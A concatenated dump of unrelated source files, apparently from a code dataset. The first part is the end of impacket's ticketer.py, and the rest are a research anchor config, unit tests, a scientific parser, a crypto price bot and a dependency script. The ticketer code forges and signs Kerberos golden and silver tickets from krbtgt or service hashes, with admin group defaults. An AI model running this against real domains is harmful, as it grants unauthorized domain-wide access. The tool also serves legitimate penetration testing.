serverChecksumBlob = pacInfos[PAC_SERVER_CHECKSUM] serverChecksumAlignment = b'\x00' * (((len(serverChecksumBlob) + 7) // 8 * 8) - len(serverChecksumBlob)) privSvrChecksum = PAC_SIGNATURE_DATA(pacInfos[PAC_PRIVSVR_CHECKSUM]) privSvrChecksumBlob = pacInfos[PAC_PRIVSVR_CHECKSUM] privSvrChecksumAlignment = b'\x00' * (((len(privSvrChecksumBlob) + 7) // 8 * 8) - len(privSvrChecksumBlob)) # The offset are set from the beginning of the PAC_TYPE # [MS-PAC] 2.4 PAC_INFO_BUFFER offsetData = 8 + len(PAC_INFO_BUFFER().getData()) * 4 # Let's build the PAC_INFO_BUFFER for each one of the elements validationInfoIB = PAC_INFO_BUFFER() validationInfoIB['ulType'] = PAC_LOGON_INFO validationInfoIB['cbBufferSize'] = len(validationInfoBlob) validationInfoIB['Offset'] = offsetData offsetData = (offsetData + validationInfoIB['cbBufferSize'] + 7) // 8 * 8 pacClientInfoIB = PAC_INFO_BUFFER() pacClientInfoIB['ulType'] = PAC_CLIENT_INFO_TYPE pacClientInfoIB['cbBufferSize'] = len(pacClientInfoBlob) pacClientInfoIB['Offset'] = offsetData offsetData = (offsetData + pacClientInfoIB['cbBufferSize'] + 7) // 8 * 8 serverChecksumIB = PAC_INFO_BUFFER() serverChecksumIB['ulType'] = PAC_SERVER_CHECKSUM serverChecksumIB['cbBufferSize'] = len(serverChecksumBlob) serverChecksumIB['Offset'] = offsetData offsetData = (offsetData + serverChecksumIB['cbBufferSize'] + 7) // 8 * 8 privSvrChecksumIB = PAC_INFO_BUFFER() privSvrChecksumIB['ulType'] = PAC_PRIVSVR_CHECKSUM privSvrChecksumIB['cbBufferSize'] = len(privSvrChecksumBlob) privSvrChecksumIB['Offset'] = offsetData # offsetData = (offsetData+privSvrChecksumIB['cbBufferSize'] + 7) //8 *8 # Building the PAC_TYPE as specified in [MS-PAC] buffers = validationInfoIB.getData() + pacClientInfoIB.getData() + serverChecksumIB.getData() + \ privSvrChecksumIB.getData() + validationInfoBlob + validationInfoAlignment + \ pacInfos[PAC_CLIENT_INFO_TYPE] + pacClientInfoAlignment buffersTail = serverChecksumBlob + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment pacType = PACTYPE() pacType['cBuffers'] = 4 pacType['Version'] = 0 pacType['Buffers'] = buffers + buffersTail blobToChecksum = pacType.getData() checkSumFunctionServer = _checksum_table[serverChecksum['SignatureType']] if serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: keyServer = Key(Enctype.AES256, unhexlify(self.__options.aesKey)) elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: keyServer = Key(Enctype.AES128, unhexlify(self.__options.aesKey)) elif serverChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value: keyServer = Key(Enctype.RC4, unhexlify(self.__options.nthash)) else: raise Exception('Invalid Server checksum type 0x%x' % serverChecksum['SignatureType']) checkSumFunctionPriv = _checksum_table[privSvrChecksum['SignatureType']] if privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes256.value: keyPriv = Key(Enctype.AES256, unhexlify(self.__options.aesKey)) elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_sha1_96_aes128.value: keyPriv = Key(Enctype.AES128, unhexlify(self.__options.aesKey)) elif privSvrChecksum['SignatureType'] == ChecksumTypes.hmac_md5.value: keyPriv = Key(Enctype.RC4, unhexlify(self.__options.nthash)) else: raise Exception('Invalid Priv checksum type 0x%x' % serverChecksum['SignatureType']) serverChecksum['Signature'] = checkSumFunctionServer.checksum(keyServer, KERB_NON_KERB_CKSUM_SALT, blobToChecksum) logging.info('\tPAC_SERVER_CHECKSUM') privSvrChecksum['Signature'] = checkSumFunctionPriv.checksum(keyPriv, KERB_NON_KERB_CKSUM_SALT, serverChecksum['Signature']) logging.info('\tPAC_PRIVSVR_CHECKSUM') buffersTail = serverChecksum.getData() + serverChecksumAlignment + privSvrChecksum.getData() + privSvrChecksumAlignment pacType['Buffers'] = buffers + buffersTail authorizationData = AuthorizationData() authorizationData[0] = noValue authorizationData[0]['ad-type'] = AuthorizationDataType.AD_WIN2K_PAC.value authorizationData[0]['ad-data'] = pacType.getData() authorizationData = encoder.encode(authorizationData) encTicketPart['authorization-data'][0]['ad-data'] = authorizationData if logging.getLogger().level == logging.DEBUG: logging.debug('Customized EncTicketPart') print(encTicketPart.prettyPrint()) print ('\n') encodedEncTicketPart = encoder.encode(encTicketPart) cipher = _enctype_table[kdcRep['ticket']['enc-part']['etype']] if cipher.enctype == EncryptionTypes.aes256_cts_hmac_sha1_96.value: key = Key(cipher.enctype, unhexlify(self.__options.aesKey)) elif cipher.enctype == EncryptionTypes.aes128_cts_hmac_sha1_96.value: key = Key(cipher.enctype, unhexlify(self.__options.aesKey)) elif cipher.enctype == EncryptionTypes.rc4_hmac.value: key = Key(cipher.enctype, unhexlify(self.__options.nthash)) else: raise Exception('Unsupported enctype 0x%x' % cipher.enctype) # Key Usage 2 # AS-REP Ticket and TGS-REP Ticket (includes TGS session # key or application session key), encrypted with the # service key (Section 5.3) logging.info('\tEncTicketPart') cipherText = cipher.encrypt(key, 2, encodedEncTicketPart, None) kdcRep['ticket']['enc-part']['cipher'] = cipherText kdcRep['ticket']['enc-part']['kvno'] = 2 # Lastly.. we have to encrypt the kdcRep['enc-part'] part # with a key we chose. It actually doesn't really matter since nobody uses it (could it be trash?) encodedEncASRepPart = encoder.encode(encASorTGSRepPart) if self.__domain == self.__server: # Key Usage 3 # AS-REP encrypted part (includes TGS session key or # application session key), encrypted with the client key # (Section 5.4.2) sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets()) logging.info('\tEncASRepPart') cipherText = cipher.encrypt(sessionKey, 3, encodedEncASRepPart, None) else: # Key Usage 8 # TGS-REP encrypted part (includes application session # key), encrypted with the TGS session key # (Section 5.4.2) sessionKey = Key(cipher.enctype, encASorTGSRepPart['key']['keyvalue'].asOctets()) logging.info('\tEncTGSRepPart') cipherText = cipher.encrypt(sessionKey, 8, encodedEncASRepPart, None) kdcRep['enc-part']['cipher'] = cipherText kdcRep['enc-part']['etype'] = cipher.enctype kdcRep['enc-part']['kvno'] = 1 if logging.getLogger().level == logging.DEBUG: logging.debug('Final Golden Ticket') print(kdcRep.prettyPrint()) print ('\n') return encoder.encode(kdcRep), cipher, sessionKey def saveTicket(self, ticket, sessionKey): logging.info('Saving ticket in %s' % (self.__target.replace('/', '.') + '.ccache')) from impacket.krb5.ccache import CCache ccache = CCache() if self.__server == self.__domain: ccache.fromTGT(ticket, sessionKey, sessionKey) else: ccache.fromTGS(ticket, sessionKey, sessionKey) ccache.saveFile(self.__target.replace('/','.') + '.ccache') def run(self): ticket, adIfRelevant = self.createBasicTicket() if ticket is not None: encASorTGSRepPart, encTicketPart, pacInfos = self.customizeTicket(ticket, adIfRelevant) ticket, cipher, sessionKey = self.signEncryptTicket(ticket, encASorTGSRepPart, encTicketPart, pacInfos) self.saveTicket(ticket, sessionKey) if __name__ == '__main__': print(version.BANNER) parser = argparse.ArgumentParser(add_help=True, description="Creates a Kerberos golden/silver tickets based on " "user options") parser.add_argument('target', action='store', help='username for the newly created ticket') parser.add_argument('-spn', action="store", help='SPN (service/server) of the target service the silver ticket will' ' be generated for. if omitted, golden ticket will be created') parser.add_argument('-request', action='store_true', default=False, help='Requests ticket to domain and clones it ' 'changing only the supplied information. It requires specifying -user') parser.add_argument('-domain', action='store', required=True, help='the fully qualified domain name (e.g. contoso.com)') parser.add_argument('-domain-sid', action='store', required=True, help='Domain SID of the target domain the ticker will be ' 'generated for') parser.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key used for signing the ticket ' '(128 or 256 bits)') parser.add_argument('-nthash', action="store", help='NT hash used for signing the ticket') parser.add_argument('-keytab', action="store", help='Read keys for SPN from keytab file (silver ticket only)') parser.add_argument('-groups', action="store", default = '513, 512, 520, 518, 519', help='comma separated list of ' 'groups user will belong to (default = 513, 512, 520, 518, 519)') parser.add_argument('-user-id', action="store", default = '500', help='user id for the user the ticket will be ' 'created for (default = 500)') parser.add_argument('-extra-sid', action="store", help='Comma separated list of ExtraSids to be included inside the ticket\'s PAC') parser.add_argument('-duration', action="store", default = '3650', help='Amount of days till the ticket expires ' '(default = 365*10)') parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') group = parser.add_argument_group('authentication') group.add_argument('-user', action="store", help='domain/username to be used if -request is chosen (it can be ' 'different from domain/username') group.add_argument('-password', action="store", help='password for domain/username') group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ' 'ommited it use the domain part (FQDN) specified in the target parameter') if len(sys.argv)==1: parser.print_help() print("\nExamples: ") print("\t./ticketer.py -nthash <krbtgt/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser\n") print("\twill create and save a golden ticket for user 'baduser' that will be all encrypted/signed used RC4.") print("\tIf you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256") print("\t(depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as") print("\tbaduser.ccache.\n") print("\t./ticketer.py -nthash <krbtgt/service nthash> -aesKey <krbtgt/service AES> -domain-sid <your domain SID> -domain " "<your domain FQDN> -request -user <a valid domain user> -password <valid domain user's password> baduser\n") print("\twill first authenticate against the KDC (using -user/-password) and get a TGT that will be used") print("\tas template for customization. Whatever encryption algorithms used on that ticket will be honored,") print("\thence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser'") print("\tand saved as baduser.ccache") sys.exit(1) options = parser.parse_args() # Init the example's logger theme logger.init(options.ts) if options.debug is True: logging.getLogger().setLevel(logging.DEBUG) # Print the Library's installation path logging.debug(version.getInstallationPath()) else: logging.getLogger().setLevel(logging.INFO) if options.domain is None: logging.critical('Domain should be specified!') sys.exit(1) if options.aesKey is None and options.nthash is None and options.keytab is None: logging.error('You have to specify either aesKey, or nthash, or keytab') sys.exit(1) if options.aesKey is not None and options.nthash is not None and options.request is False: logging.error('You cannot specify both -aesKey and -nthash w/o using -request. Pick only one') sys.exit(1) if options.request is True and options.user is None: logging.error('-request parameter needs -user to be specified') sys.exit(1) if options.request is True and options.hashes is None and options.password is None: from getpass import getpass password = getpass("Password:") else: password = options.password try: executer = TICKETER(options.target, password, options.domain, options) executer.run() except Exception as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() print(str(e))
52.053856
141
0.643882
29e974af201dcee8b38bb970fb7ac08a747999f9
794
py
Python
head_detection/data/anchors.py
eplatero97/HeadHunter
f72ef06263a530102b3de1894f94d65255aecb37
[ "MIT" ]
60
2021-06-20T06:17:30.000Z
2022-03-30T03:04:48.000Z
head_detection/data/anchors.py
eplatero97/HeadHunter
f72ef06263a530102b3de1894f94d65255aecb37
[ "MIT" ]
21
2021-06-21T09:39:27.000Z
2022-02-07T22:41:43.000Z
head_detection/data/anchors.py
eplatero97/HeadHunter
f72ef06263a530102b3de1894f94d65255aecb37
[ "MIT" ]
16
2021-06-22T03:07:06.000Z
2022-01-18T16:52:05.000Z
#!/usr/bin/env python # coding: utf-8 shead_anchors = ((18,), (36,), (72,), (128,), (208,), (320,), (512,), (768,)) chuman_anchors = ((10,), (48,), (128,), (192,), (256,), (320,), (512,)) comb_anchors = ((12,), (32,), (64,), (112,), (196, ), (256,), (384,), (512,)) hh_anchors = ((12,), (18,), (24,), (32,), (48, ), (64,), (128,)) sh_anchors = {'anchor_sizes' : shead_anchors, 'aspect_ratios' : ((0.5, 1.0, 1.5),) * len(shead_anchors)} ch_anchors = {'anchor_sizes' : chuman_anchors, 'aspect_ratios' : ((0.5, 1.0, 2.0),) * len(chuman_anchors)} combined_anchors = {'anchor_sizes' : comb_anchors, 'aspect_ratios' : ((0.5, 1.0, 1.5),) * len(comb_anchors)} headhunt_anchors = {'anchor_sizes' : hh_anchors, 'aspect_ratios' : ((0.5, 1.0, 1.5),) * len(hh_anchors)}
34.521739
77
0.549118
d4837cacfc1bff3a5e939855ed791222efe603da
5,411
py
Python
tests/test_dblib.py
locriandev/doozer
375eafccc15aadfd18dc50061eccb9a917d31b0b
[ "Apache-2.0" ]
16
2018-11-06T16:49:03.000Z
2021-11-07T19:48:49.000Z
tests/test_dblib.py
locriandev/doozer
375eafccc15aadfd18dc50061eccb9a917d31b0b
[ "Apache-2.0" ]
479
2018-11-15T15:37:49.000Z
2022-03-31T08:39:44.000Z
tests/test_dblib.py
locriandev/doozer
375eafccc15aadfd18dc50061eccb9a917d31b0b
[ "Apache-2.0" ]
38
2018-11-07T14:33:15.000Z
2021-12-13T13:59:12.000Z
import unittest from doozerlib.dblib import DB, Record from multiprocessing import RLock, Lock, Semaphore import logging import datetime import pathlib import traceback import sys import mock class FakeMetaData(object): def __init__(self): self.name = "test" self.namespace = "test_namespace" self.qualified_key = "test_qualified_key" self.qualified_name = "test_qualified_name" class FakeRuntime(object): """This is a fake runtime class to inject into dblib running tests.""" mutex = RLock() def __init__(self): self.logger = logging.getLogger(__name__) # Create a "uuid" which will be used in FROM fields during updates self.uuid = datetime.datetime.now().strftime("%Y%m%d.%H%M%S") self.user = "" self.group_config = dict() self.group_config["name"] = "test" # Cooperative threads can request exclusive access to directories. # This is usually only necessary if two threads want to make modifications # to the same global source alias. The empty string key serves as a lock for the # data structure. self.dir_locks = {'': Lock()} # See get_named_semaphore. The empty string key serves as a lock for the data structure. self.named_semaphores = {'': Lock()} def get_named_lock(self, absolute_path): with self.dir_locks['']: p = pathlib.Path(absolute_path).absolute() # normalize (e.g. strip trailing /) if p in self.dir_locks: return self.dir_locks[p] else: new_lock = Lock() self.dir_locks[p] = new_lock return new_lock def get_named_semaphore(self, lock_name, is_dir=False, count=1): """ Returns a semaphore (which can be used as a context manager). The first time a lock_name is received, a new semaphore will be established. Subsequent uses of that lock_name will receive the same semaphore. :param lock_name: A unique name for resource threads are contending over. If using a directory name as a lock_name, provide an absolute path. :param is_dir: The lock_name is a directory (method will ignore things like trailing slashes) :param count: The number of times the lock can be claimed. Default=1, which is a full mutex. :return: A semaphore associated with the lock_name. """ with self.named_semaphores['']: if is_dir: p = '_dir::' + str(pathlib.Path(str(lock_name)).absolute()) # normalize (e.g. strip trailing /) else: p = lock_name if p in self.named_semaphores: return self.named_semaphores[p] else: new_semaphore = Semaphore(count) self.named_semaphores[p] = new_semaphore return new_semaphore @staticmethod def timestamp(): return datetime.datetime.utcnow().isoformat() class DBLibTest(unittest.TestCase): def setUp(self): self.setup_failed = False try: self.fake_runtime = FakeRuntime() self.db = DB(runtime=self.fake_runtime, environment="test") except Exception: traceback.print_exc() self.setup_failed = True def test_select_withoutenv(self): if not self.setup_failed: self.assertEqual(len(self.db.select("select * from test", 10)), 0) def test_record(self): if not self.setup_failed: try: with self.db.record(operation="build", metadata=None): Record.set("name", "test") Record.set("position", "record") with self.db.record(operation="build", metadata=None): Record.set("name", "test2") Record.set("position", "record2") Record.set("position2", "r_record2") except Exception: self.fail(msg="Failed to record.") else: self.skipTest(reason="DB setup failed for running test.") def test_record_with_metadata(self): if not self.setup_failed: try: with self.db.record(operation="build", metadata=FakeMetaData()): Record.set("name", "test") Record.set("position", "record") Record.set("country", "USA") Record.set("population", 45435432523) except Exception: self.fail(msg="Failed to create record with extras.") else: self.skipTest(reason="DB setup failed for running test.") def test_record_with_empty_value(self): if not self.setup_failed: try: with self.db.record(operation='build', metadata=None): Record.set("name", "test") Record.set("position", None) Record.set("country", "") Record.set("population", 0) except Exception: self.fail(msg="Failed to create record with missing attribute value.") else: self.skipTest(reason="DB setup failed for running test.") def tearDown(self): pass if __name__ == "__main__": logging.basicConfig(stream=sys.stdout) unittest.main()
35.598684
112
0.592682
4abd04b3f188f7f0c8e38cb8fdf5d6f743626599
394
py
Python
neurodsp/plts/__init__.py
elybrand/neurodsp
96355f4c75e1eedef2a77a8bfafc718f80b8dae3
[ "Apache-2.0" ]
null
null
null
neurodsp/plts/__init__.py
elybrand/neurodsp
96355f4c75e1eedef2a77a8bfafc718f80b8dae3
[ "Apache-2.0" ]
null
null
null
neurodsp/plts/__init__.py
elybrand/neurodsp
96355f4c75e1eedef2a77a8bfafc718f80b8dae3
[ "Apache-2.0" ]
null
null
null
"""Plotting functions.""" from .time_series import plot_time_series, plot_bursts, plot_instantaneous_measure from .filt import plot_filter_properties, plot_frequency_response, plot_impulse_response from .rhythm import plot_swm_pattern, plot_lagged_coherence from .spectral import (plot_power_spectra, plot_spectral_hist, plot_scv, plot_scv_rs_lines, plot_scv_rs_matrix)
49.25
88
0.814721
2513075704ca69a5b4da09cad0785566130d8fc4
9,554
py
Python
aiida_kkr/parsers/kkr.py
markusstruckmann/aiida-kkr
5ce20a61a667787aeb68fa0c8b81e73aa3cf94a5
[ "MIT" ]
6
2018-11-16T10:44:06.000Z
2021-02-09T15:38:51.000Z
aiida_kkr/parsers/kkr.py
RubelMozumder/aiida-kkr
1db3d57626c27f2a7105d587dfb8543269ce6c00
[ "MIT" ]
63
2018-11-27T10:43:49.000Z
2022-02-10T11:10:16.000Z
aiida_kkr/parsers/kkr.py
RubelMozumder/aiida-kkr
1db3d57626c27f2a7105d587dfb8543269ce6c00
[ "MIT" ]
9
2018-11-09T09:52:16.000Z
2021-12-10T18:09:11.000Z
# -*- coding: utf-8 -*- """ Parser for the KKR Code. The parser should never fail, but it should catch all errors and warnings and show them to the user. """ from __future__ import absolute_import from aiida.parsers.parser import Parser from aiida.orm import Dict from aiida_kkr.calculations.kkr import KkrCalculation from aiida.common.exceptions import InputValidationError from masci_tools.io.parsers.kkrparser_functions import parse_kkr_outputfile, check_error_category from masci_tools.io.common_functions import search_string __copyright__ = (u"Copyright (c), 2017, Forschungszentrum Jülich GmbH, " "IAS-1/PGI-1, Germany. All rights reserved.") __license__ = "MIT license, see LICENSE.txt file" __version__ = "0.6.3" __contributors__ = ("Jens Broeder", u"Philipp Rüßmann") class KkrParser(Parser): """ Parser class for parsing output of KKR code.. """ def __init__(self, calc): """ Initialize the instance of KkrParser """ # needed for KKRimporter parser self.icrit = 0 self._ParserVersion = __version__ #reuse init of base class super(KkrParser, self).__init__(calc) # pylint: disable=protected-access def parse(self, **kwargs): """ Parse output data folder, store results in database. :param retrieved: a dictionary of retrieved nodes, where the key is the link name :returns: a tuple with two values ``(bool, node_list)``, where: * ``bool``: variable to tell if the parsing succeeded * ``node_list``: list of new nodes to be stored in the db (as a list of tuples ``(link_name, node)``) """ success = False node_list = () # Get retrieved folders try: out_folder = self.retrieved except exceptions.NotExistent: return self.exit_codes.ERROR_NO_RETRIEVED_FOLDER # check what is inside the folder list_of_files = out_folder._repository.list_object_names() # we need at least the output file name as defined in calcs.py if KkrCalculation._DEFAULT_OUTPUT_FILE not in list_of_files: msg = "Output file '{}' not found in list of files: {}".format(KkrCalculation._DEFAULT_OUTPUT_FILE, list_of_files) if self.icrit==0: # this check turns this off for the KKRimporter calculation self.logger.error(msg) return self.exit_codes.ERROR_NO_OUTPUT_FILE # determine whether or not everything should be parsed or not (e.g. qdos option) skip_mode = False only_000_present = False with out_folder.open(KkrCalculation._INPUT_FILE_NAME) as file: txt = file.readlines() itmp = search_string('RUNOPT', txt) if itmp>=0: runopts = txt[itmp+1] if 'qdos' in runopts: skip_mode = True if 'KKRFLEX' in runopts: only_000_present = True # now collect the rest of the files file_errors = [] # Parse output files of KKR calculation if KkrCalculation._DEFAULT_OUTPUT_FILE in out_folder.list_object_names(): outfile = out_folder.open(KkrCalculation._DEFAULT_OUTPUT_FILE) else: file_errors.append((1+self.icrit, msg)) outfile = None # get path to files and catch errors if files are not present # append tupels (error_category, error_message) where error_category is # 1: critical error, always leads to failing of calculation # 2: warning, is inspected and checked for consistency with read-in # out_dict values (e.g. nspin, newsosol, ...) fname = KkrCalculation._OUTPUT_0_INIT if fname in out_folder.list_object_names(): outfile_0init = out_folder.open(fname) else: file_errors.append((1+self.icrit, "Critical error! OUTPUT_0_INIT not found {}".format(fname))) outfile_0init = None fname = KkrCalculation._OUTPUT_000 if fname in out_folder.list_object_names(): outfile_000 = out_folder.open(fname) else: file_errors.append((1+self.icrit, "Critical error! OUTPUT_000 not found {}".format(fname))) outfile_000 = None fname = KkrCalculation._OUTPUT_2 if fname in out_folder.list_object_names(): outfile_2 = out_folder.open(fname) else: if not only_000_present: file_errors.append((1+self.icrit, "Critical error! OUTPUT_2 not found {}".format(fname))) outfile_2 = None else: outfile_2 = outfile_000 fname = KkrCalculation._OUT_POTENTIAL if fname in out_folder.list_object_names(): potfile_out = out_folder.open(fname) else: file_errors.append((1+self.icrit, "Critical error! OUT_POTENTIAL not found {}".format(fname))) potfile_out = None fname = KkrCalculation._OUT_TIMING_000 if fname in out_folder.list_object_names(): timing_file = out_folder.open(fname) else: file_errors.append((1+self.icrit, "Critical error! OUT_TIMING_000 not found {}".format(fname))) timing_file = None fname = KkrCalculation._NONCO_ANGLES_OUT if fname in out_folder.list_object_names(): nonco_out_file = out_folder.open(fname) else: file_errors.append((2, "Error! NONCO_ANGLES_OUT not found {}".format(fname))) nonco_out_file = None out_dict = {'parser_version': self._ParserVersion, 'calculation_plugin_version': KkrCalculation._CALCULATION_PLUGIN_VERSION} #TODO job title, compound description success, msg_list, out_dict = parse_kkr_outputfile(out_dict, outfile, outfile_0init, outfile_000, timing_file, potfile_out, nonco_out_file, outfile_2, skip_readin=skip_mode) # try to parse with other combinations of files to minimize parser errors if self.icrit != 0: self.logger.info('msg_list0: {}'.format(msg_list)) # try second combination of files out_dict2 = out_dict.copy() success2, msg_list2, out_dict2 = parse_kkr_outputfile(out_dict2, outfile_2, outfile_0init, outfile_000, timing_file, potfile_out, nonco_out_file, outfile_2, skip_readin=skip_mode) self.logger.info('msg_list1: {}'.format(msg_list2)) if len(msg_list2)<len(msg_list): # overwrite parser outputs if fewer errors self.logger.info('take output of parser run 1') success, msg_list, out_dict = success2, msg_list2, out_dict2 # try third combination of files out_dict2 = out_dict.copy() success2, msg_list2, out_dict2 = parse_kkr_outputfile(out_dict2, outfile_000, outfile_0init, outfile_000, timing_file, potfile_out, nonco_out_file, outfile_2, skip_readin=skip_mode) self.logger.info('msg_list2: {}'.format(msg_list2)) if len(msg_list2)<len(msg_list): # overwrite parser outputs if fewer errors self.logger.info('take output of parser run 2') success, msg_list, out_dict = success2, msg_list2, out_dict2 out_dict['parser_errors'] = msg_list # add file open errors to parser output of error messages for (err_cat, f_err) in file_errors: if err_cat == 1: msg_list.append(f_err) elif check_error_category(err_cat, f_err, out_dict): msg_list.append(f_err) else: if 'parser_warnings' not in list(out_dict.keys()): out_dict['parser_warnings'] = [] out_dict['parser_warnings'].append(f_err.replace('Error', 'Warning')) out_dict['parser_errors'] = msg_list #create output node and link self.out('output_parameters', Dict(dict=out_dict)) if self.icrit != 0 and not success: # overwrite behavior with KKRimporter success = True # set automatically to True even if only partial output was parsed msg = "Automatically returned success=True for KKR importer although some parsing errors occurred" self.logger.warning(msg) if not success: return self.exit_codes.ERROR_KKR_PARSING_FAILED else: # cleanup after parsing (only if parsing was successful) # delete completely parsed output files self.remove_unnecessary_files() # then (maybe) tar the output to save space #TODO needs implementing (see kkrimp parser) def remove_unnecessary_files(self): """ Remove files that are not needed anymore after parsing The information is completely parsed (i.e. in outdict of calculation) and keeping the file would just be a duplication. """ files_to_delete = [KkrCalculation._POTENTIAL, KkrCalculation._SHAPEFUN] for fileid in files_to_delete: if fileid in self.retrieved.list_object_names(): self.retrieved.delete_object(fileid, force=True)
44.02765
126
0.623613
84b05d1a7a94cb09f625fa7f7ace2201ac1d0cff
594
py
Python
ray_beam_runner/util.py
pabloem/ray_beam_runner
ec884d66067071f44eff7ca4be032474e2261e93
[ "Apache-2.0" ]
12
2022-01-13T05:58:45.000Z
2022-03-31T23:05:59.000Z
ray_beam_runner/util.py
pabloem/ray_beam_runner
ec884d66067071f44eff7ca4be032474e2261e93
[ "Apache-2.0" ]
7
2022-02-23T09:58:54.000Z
2022-03-29T21:44:53.000Z
ray_beam_runner/util.py
pabloem/ray_beam_runner
ec884d66067071f44eff7ca4be032474e2261e93
[ "Apache-2.0" ]
3
2022-02-23T04:28:08.000Z
2022-03-13T19:15:35.000Z
import ray from apache_beam.pipeline import PipelineVisitor class PipelinePrinter(PipelineVisitor): def visit_value(self, value, producer_node): print(f"visit_value(value, {producer_node.full_label})") def visit_transform(self, transform_node): print(f"visit_transform({type(transform_node.transform)})") def enter_composite_transform(self, transform_node): print(f"enter_composite_transform({transform_node.full_label})") def leave_composite_transform(self, transform_node): print(f"leave_composite_transform({transform_node.full_label})")
34.941176
72
0.765993
203f4e693b3cb361ddd7e6c0003d0073a15911b8
249
py
Python
test/gallery/proteinsignal/testChemotaxis.py
jeanqasaur/jeeves
1b5783a98f88fa2fc9e4cae7e005d2c9242cfea4
[ "MIT" ]
253
2015-01-02T01:54:27.000Z
2022-03-10T01:44:02.000Z
test/gallery/proteinsignal/testChemotaxis.py
jeanqasaur/jeeves
1b5783a98f88fa2fc9e4cae7e005d2c9242cfea4
[ "MIT" ]
4
2015-06-09T03:36:28.000Z
2017-08-11T15:54:24.000Z
test/gallery/proteinsignal/testChemotaxis.py
jeanqasaur/jeeves
1b5783a98f88fa2fc9e4cae7e005d2c9242cfea4
[ "MIT" ]
29
2015-02-14T02:24:08.000Z
2021-12-16T02:46:16.000Z
import JeevesLib from smt.Z3 import * import unittest from RSphaeroides import RSphaeroides import JeevesLib class TestAuction(unittest.TestCase): def setUp(self): JeevesLib.init() def test_something(self): r = RSphaeroides() pass
17.785714
37
0.75502
84c0faf62ebb6df665e10c17de64d236f891e58b
895
py
Python
examples/bots/bot 1/job.py
Sal0hc1n/crypto-price-api
d5580ca3a0f0267e73927212d8b182a4d2e5db8e
[ "MIT" ]
null
null
null
examples/bots/bot 1/job.py
Sal0hc1n/crypto-price-api
d5580ca3a0f0267e73927212d8b182a4d2e5db8e
[ "MIT" ]
null
null
null
examples/bots/bot 1/job.py
Sal0hc1n/crypto-price-api
d5580ca3a0f0267e73927212d8b182a4d2e5db8e
[ "MIT" ]
null
null
null
from bot.App import bot from bot import crud from bot import coin def user_job(chat_id): user = crud.get_user(chat_id) new_value = coin.get_current_value() diff = new_value - user.value if abs(diff) > user.overweight: crud.update_value(chat_id, new_value) prefix = "Up" if diff > 0 else "Down" body = prefix + ": " + str(new_value) + " | Diff: " + str(int(diff)) bot.send_message(chat_id, body) if new_value > user.max_value: body = "Alert! Rose higher: " + str(user.max_value) + " | " + " Current: " + str(new_value) crud.update_max_value(chat_id, new_value) bot.send_message(chat_id, body) if new_value < user.min_value: body = "Alert! Fell below: " + str(user.min_value) + " | " + " Current: " + str(new_value) crud.update_min_value(chat_id, new_value) bot.send_message(chat_id, body)
37.291667
99
0.631285
55d21d5afd2aaf91df16908d5df7eecad3784c55
3,848
py
Python
scripts/01_normalize_packages.py
facade-technologies-inc/facile
4c9134dced71734641fed605e152880cd9ddefe3
[ "MIT" ]
2
2020-09-17T20:51:18.000Z
2020-11-03T15:58:10.000Z
scripts/01_normalize_packages.py
facade-technologies-inc/facile
4c9134dced71734641fed605e152880cd9ddefe3
[ "MIT" ]
97
2020-08-26T05:07:08.000Z
2022-03-28T16:01:49.000Z
scripts/01_normalize_packages.py
facade-technologies-inc/facile
4c9134dced71734641fed605e152880cd9ddefe3
[ "MIT" ]
null
null
null
import os import pygit2 import pip import subprocess temp_req_file = "temp_requirements.txt" perm_req_file = "../requirements.txt" # Mapping of dependencies to download and install from Facade Technologies github # These are generally repositories that needed to be forked and modified to work with Facile. requirements_from_source = { "qtmodern": ("https://github.com/facade-technologies-inc/qtmodern.git", "master"), "qnotifications": ("https://github.com/facade-technologies-inc/QNotifications", "master"), } if __name__ == "__main__": # -- Get current list of installed packages. ----------------------------------------------------------------------- os.system(f"pip freeze > {temp_req_file}") with open(temp_req_file) as f: cur_reqs = set(f.readlines()) os.remove(temp_req_file) # -- Get list of necessary requirements ---------------------------------------------------------------------------- with open(perm_req_file) as f: needed_reqs = set(f.readlines()) # -- Determine which requirements we have, need to get rid of, or need to install. --------------------------------- unnecessary_packages = [p for p in cur_reqs - needed_reqs if p not in requirements_from_source] have_packages = cur_reqs.intersection(needed_reqs) needed_packages = list(needed_reqs - cur_reqs) # -- Uninstall unnecessary packages -------------------------------------------------------------------------------- for package in unnecessary_packages: print(f"Uninstalling {package}") os.system(f"pip uninstall -y {package} 1>nul 2>&1") # -- Install all required dependencies (if not installing from source) --------------------------------------------- for package in needed_packages: stripped_package = package.replace("="," ").replace(">", " ").replace("<", " ").split()[0].lower() if stripped_package not in requirements_from_source: os.system(f"pip install --no-deps {package} 1>nul 2>&1") # -- Clone/Pull any dependencies which are not hosted on PyPi) ----------------------------------------------------- for package, repo in requirements_from_source.items(): url, branchName = repo repo_path = os.path.normpath(os.path.join(os.path.dirname(__file__), "../../", package)) # if the repo already exists, switch to the target branch and pull if os.path.exists(repo_path): print('') print(f"Pulling: {package} @ branch: {branchName}") repoObj = pygit2.Repository(os.path.join(repo_path, ".git")) branch = repoObj.lookup_branch(branchName) ref = repoObj.lookup_reference(branch.name) repoObj.checkout(ref) freeze_loc = os.getcwd() os.chdir(repo_path) output = subprocess.check_output(["git", "pull"]) os.chdir(freeze_loc) else: print(f"Cloning: {package} @ branch: {branchName}") pygit2.clone_repository(url, repo_path, checkout_branch=branchName) print(f"Installing from source: {package}") pip.main(["install", repo_path]) print('') # -- Print a report of what was done ------------------------------------------------------------------------------- report = { "These are extra (we uninstalled them for you)": 